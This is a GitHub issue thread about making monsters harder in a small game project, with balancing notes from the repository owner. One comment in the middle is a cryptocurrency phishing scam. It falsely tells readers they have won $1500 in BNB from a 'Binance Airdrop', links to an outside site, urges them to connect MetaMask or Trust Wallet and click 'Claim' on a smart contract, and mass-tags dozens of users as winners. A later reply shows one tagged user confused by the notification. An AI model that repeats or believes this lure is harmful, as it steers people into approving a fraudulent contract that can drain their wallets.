### ISSUE TITLE
Make monsters stronger

### ISSUE THREAD

**Issue by conradojordan** [conradojordan/conradojordan.github.io#18]
When getting levels and items, monsters are too easy.
We should test how difficult the monster is by battling him with the lowest level a player can battle him and without items. In this condition, it should be **hard** to win against the monster (probably impossible, since the player already start with items).
When the player has an ok level and ok items, it should still be somewhat difficult.
When the player has good level and good items (compared to the monster), just then the battle just be easy. But still the player should suffer some damage if possible

**Comment by conradojordan** [comment]
Additional comment:
All of health, strength and resilience from the monsters can be changed to achieve this. Feel free to test different things

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @jorgereiis, @Rodrigo-Abreuu, @diegosantosouza, @SttavoS, @schonmann, @randymz10, @SpinnerZ, @carlosPauli1, @tomaslmz, @devreiis, @RafaelPena31, @victorZoro, @clarammenezes, @Hulkin, @amadeusine, @FernandoMedin, @hiagomoura, @jonasffonseca, @MeeCunha, @thiagovpaz, @RodrigoBecker, @fabioassuncao, @arieloliveiramartins, @diegosfc100, @MarcoMacias, @lffranca, @AlgoritmoGaia, @mikaelkkn, @Ilqar555, @MarlonRF, @carolinaknoll, @aristoxen, @leoovogel, @darlantc, @RaiLincolnSS, @hugobrilhante, @OTalDoL2, @maumaucb18, @raianecj, @GabrielSimonassi, @ThiagoSantosAirboy, @TallysonOliveira, @milllla, @argus-cs, @AllanLps, @Alysson-Araujo, @medeirosinacio, @diasbandeira, @betodasilva, @crisaoo

**Comment by conradojordan** [comment]
Solved by #26

**Comment by MarcoMacias** [comment]
Boa tarde, não entendi o motivo desse email.

Em qui., 30 de mai. de 2024 às 11:47, Conrado Jordan <
***@***.***> escreveu:
